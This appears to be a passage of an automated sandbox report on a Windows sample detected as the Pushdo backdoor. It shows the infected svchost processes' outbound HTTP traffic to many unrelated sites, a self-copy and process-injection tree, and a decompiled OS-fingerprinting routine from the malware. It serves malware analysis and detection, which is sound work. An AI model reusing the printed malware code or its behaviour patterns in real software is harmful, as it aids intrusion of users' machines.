2023-03-22 04:45:58 UTC	3220	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Set-Cookie: PHPSESSID=a78d670f716f54abce2c22ba973ab5e9; path=/ Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t60%2BmP9T1iRc3LmVRp9zz5Ri0FkNaobyHP9OO%2FBgsXs5V17%2Bc5O1EvBRloPs4st%2FhlSS%2BA%2BYaJWFqEff0hanIbbNM29h2MTEPbG0pQ7gQEDzpvDLFhA%2F7Qv%2BNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9c41ff4383d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:58 UTC	3221	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.5	27491	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3219	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:57 UTC	3219	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:57 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:57 UTC	3219	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	50316	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:31 UTC	67	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:44:31 UTC	68	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:44:31 UTC	68	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:44:31 UTC	84	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:44:31 UTC	100	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:44:31 UTC	116	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.5	27503	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3220	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 6gjnnBAbpc.exePID: 5932, Parent PID: 3324

General

Target ID:	0
Start time:	05:43:01
Start date:	22/03/2023
Path:	C:\Users\user\Desktop\6gjnnBAbpc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\6gjnnBAbpc.exe
Imagebase:	0x400000
File size:	259072 bytes
MD5 hash:	9FAEA65CFF61AD64E4BC4C3913C336BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: pigalicapi.exePID: 1332, Parent PID: 3324

General

Target ID:	1
Start time:	05:43:15
Start date:	22/03/2023
Path:	C:\Users\user\pigalicapi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\pigalicapi.exe"
Imagebase:	0x400000
File size:	259072 bytes
MD5 hash:	9FAEA65CFF61AD64E4BC4C3913C336BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: pigalicapi.exePID: 5956, Parent PID: 3324

General

Target ID:	2
Start time:	05:43:27
Start date:	22/03/2023
Path:	C:\Users\user\pigalicapi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\pigalicapi.exe"
Imagebase:	0x400000
File size:	259072 bytes
MD5 hash:	9FAEA65CFF61AD64E4BC4C3913C336BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5264, Parent PID: 5932

General

Target ID:	3
Start time:	05:43:45
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6052, Parent PID: 1332

General

Target ID:	6
Start time:	05:43:59
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4400, Parent PID: 5956

General

Target ID:	7
Start time:	05:44:15
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5260, Parent PID: 5264

General

Target ID:	8
Start time:	05:44:23
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1640, Parent PID: 5264

General

Target ID:	9
Start time:	05:44:23
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5560, Parent PID: 5264

General

Target ID:	10
Start time:	05:44:24
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5128, Parent PID: 5264

General

Target ID:	11
Start time:	05:44:25
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7420, Parent PID: 5932

General

Target ID:	12
Start time:	05:44:34
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 10440, Parent PID: 6052

General

Target ID:	13
Start time:	05:44:36
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 11604, Parent PID: 6052

General

Target ID:	14
Start time:	05:44:37
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 13740, Parent PID: 6052

General

Target ID:	15
Start time:	05:44:38
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 16472, Parent PID: 6052

General

Target ID:	16
Start time:	05:44:40
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 23212, Parent PID: 4400

General

Target ID:	17
Start time:	05:44:53
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 23252, Parent PID: 4400

General

Target ID:	18
Start time:	05:44:55
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 23308, Parent PID: 4400

General

Target ID:	19
Start time:	05:44:56
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6004, Parent PID: 4400

General

Target ID:	21
Start time:	05:44:59
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 23940, Parent PID: 1332

General

Target ID:	22
Start time:	05:45:04
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0xc0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 6gjnnBAbpc.exePID: 5932, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	19%
Total number of Nodes:	1846
Total number of Limit Nodes:	39

Executed Functions

Function 00E60000 Relevance: 70.7, APIs: 2, Strings: 38, Instructions: 729
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00E6048B
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00E604BB

Strings

ushI, xrefs: 00E60169
yA, xrefs: 00E600F3
A, xrefs: 00E60115
fo, xrefs: 00E60203
o, xrefs: 00E60197
A, xrefs: 00E6021E
st, xrefs: 00E6017B
ucti, xrefs: 00E6018C
S, xrefs: 00E600B5
Ta, xrefs: 00E60257
mI, xrefs: 00E601F2
a, xrefs: 00E6013B
Vi, xrefs: 00E600FA
t, xrefs: 00E60155
tu, xrefs: 00E60105
Rt, xrefs: 00E6020D
b, xrefs: 00E600E1
tNat, xrefs: 00E601DB
b, xrefs: 00E60261
P, xrefs: 00E60144
iv, xrefs: 00E601E3
Lo, xrefs: 00E600CA
Via, xrefs: 00E602EC
Li, xrefs: 00E600DA
Cach, xrefs: 00E601CB
G, xrefs: 00E601D6
F, xrefs: 00E6015A
ee, xrefs: 00E600BE
oc, xrefs: 00E60122
tu, xrefs: 00E60134
otec, xrefs: 00E6014D
Fu, xrefs: 00E60234
a, xrefs: 00E600EA
a, xrefs: 00E600D1
p, xrefs: 00E600C5
ctio, xrefs: 00E60245
Syst, xrefs: 00E601EA
a, xrefs: 00E6010C

Memory Dump Source

Source File: 00000000.00000002.649432754.0000000000E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_6gjnnBAbpc.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
Instruction ID: 52ea65827af647618a7a05eb0cd1ae8c253ccba33d0cee5eb7ac2a7edb837d09
Opcode Fuzzy Hash: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
Instruction Fuzzy Hash: 9D5299715483918FE324CF24D880BABBBE1FF94744F04582EE9C99B252E770E948CB56

Uniqueness

Uniqueness Score: -1.00%

Function 04008F80 Relevance: 63.2, APIs: 22, Strings: 14, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
				int _v8;
				struct _SYSTEM_INFO _v44;
				signed int _v50;
				signed short _v52;
				struct _OSVERSIONINFOA _v204;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
					L45:
					return _v8;
				} else {
					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
					_v204.dwOSVersionInfoSize = 0x9c;
					E04007D20( &_v44,  &_v44, 0, 0x24);
					if(GetVersionExA( &_v204) == 0) {
						L43:
						if(_v8 == 0) {
							lstrcatA(_a4, "UndefinedOS");
						}
						goto L45;
					}
					GetSystemInfo( &_v44); // executed
					if(_v204.dwMajorVersion != 5) {
						if(_v204.dwMajorVersion == 6) {
							if(_v204.dwMinorVersion != 0) {
								if(_v204.dwMinorVersion != 1) {
									if(_v204.dwMinorVersion == 2) {
										if((_v50 & 0x000000ff) == 1) {
											if((_v50 & 0x000000ff) == 1) {
												lstrcatA(_a4, "Win8");
												 *_a12 = 0xb;
											}
										} else {
											lstrcatA(_a4, "WinServer2012");
											 *_a12 = 0xc;
										}
									}
								} else {
									if((_v50 & 0x000000ff) == 1) {
										if((_v50 & 0x000000ff) == 1) {
											lstrcatA(_a4, "Win7");
											 *_a12 = 8;
										}
									} else {
										lstrcatA(_a4, "WinServer2008R2");
										 *_a12 = 0xa;
									}
								}
							} else {
								if((_v50 & 0x000000ff) != 1) {
									if((_v50 & 0x000000ff) != 1) {
										lstrcatA(_a4, "WinServer2008");
										 *_a12 = 9;
									}
								} else {
									lstrcatA(_a4, "Vista");
									 *_a12 = 7;
								}
							}
						}
						L38:
						if(E04009290() != 0) {
							lstrcatA(_a4, "_x64");
						}
						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
							lstrcatA(_a4, "_");
							lstrcatA(_a4,  &(_v204.szCSDVersion));
						}
						_v8 = lstrlenA(_a4);
						goto L43;
					}
					if(_v204.dwMinorVersion != 0) {
						if(_v204.dwMinorVersion != 1) {
							if(_v204.dwMinorVersion == 2) {
								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
									if(GetSystemMetrics(0x59) != 0) {
										if(GetSystemMetrics(0x59) == 0) {
											if((_v52 & 0x8000) != 0) {
												lstrcatA(_a4, "WinHomeServer");
												 *_a12 = 4;
											}
										} else {
											lstrcatA(_a4, "WinServer2003R2");
											 *_a12 = 6;
										}
									} else {
										lstrcatA(_a4, "WinServer2003");
										 *_a12 = 5;
									}
								} else {
									lstrcatA(_a4, "WinXP64");
									 *_a12 = 3;
								}
							}
						} else {
							lstrcatA(_a4, "WinXP");
							 *_a12 = 2;
						}
					} else {
						lstrcatA(_a4, "Win2K");
						 *_a12 = 1;
					}
					goto L38;
				}
			}

0x04008f89
0x04008f94
0x0400927b
0x04009281
0x04008fae
0x04008fce
0x04008fd6
0x04008fe8
0x04008fff
0x04009266
0x0400926a
0x04009275
0x04009275
0x00000000
0x0400926a
0x04009009
0x04009016
0x0400911c
0x04009129
0x0400917b
0x040091ca
0x040091d3
0x040091f6
0x04009201
0x0400920a
0x0400920a
0x040091d5
0x040091de
0x040091e7
0x040091e7
0x040091d3
0x0400917d
0x04009184
0x040091a7
0x040091b2
0x040091bb
0x040091bb
0x04009186
0x0400918f
0x04009198
0x04009198
0x040091c1
0x0400912b
0x04009132
0x04009155
0x04009160
0x04009169
0x04009169
0x04009134
0x0400913d
0x04009146
0x04009146
0x0400916f
0x04009129
0x04009210
0x04009217
0x04009222
0x04009222
0x04009237
0x04009242
0x04009253
0x04009253
0x04009263
0x00000000
0x04009263
0x04009023
0x04009049
0x0400906f
0x0400907c
0x040090ab
0x040090d1
0x040090f6
0x04009101
0x0400910a
0x0400910a
0x040090d3
0x040090dc
0x040090e5
0x040090e5
0x040090ad
0x040090b6
0x040090bf
0x040090bf
0x04009087
0x04009090
0x04009099
0x04009099
0x0400907c
0x0400904b
0x04009054
0x0400905d
0x0400905d
0x04009025
0x0400902e
0x04009037
0x04009037
0x00000000
0x04009110

APIs

GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
GetSystemInfo.KERNEL32(?), ref: 04009009
lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
lstrlenA.KERNEL32(?), ref: 0400922F
lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
lstrcatA.KERNEL32(00000000,?), ref: 04009253
lstrlenA.KERNEL32(00000000), ref: 0400925D
lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275

Strings

_x64, xrefs: 04009219
WinHomeServer, xrefs: 040090F8
WinServer2003, xrefs: 040090AD
WinServer2008R2, xrefs: 04009186
Win8, xrefs: 040091F8
Win7, xrefs: 040091A9
WinXP64, xrefs: 04009087
Vista, xrefs: 04009134
UndefinedOS, xrefs: 0400926C
WinServer2008, xrefs: 04009157
WinServer2012, xrefs: 040091D5
Win2K, xrefs: 04009025
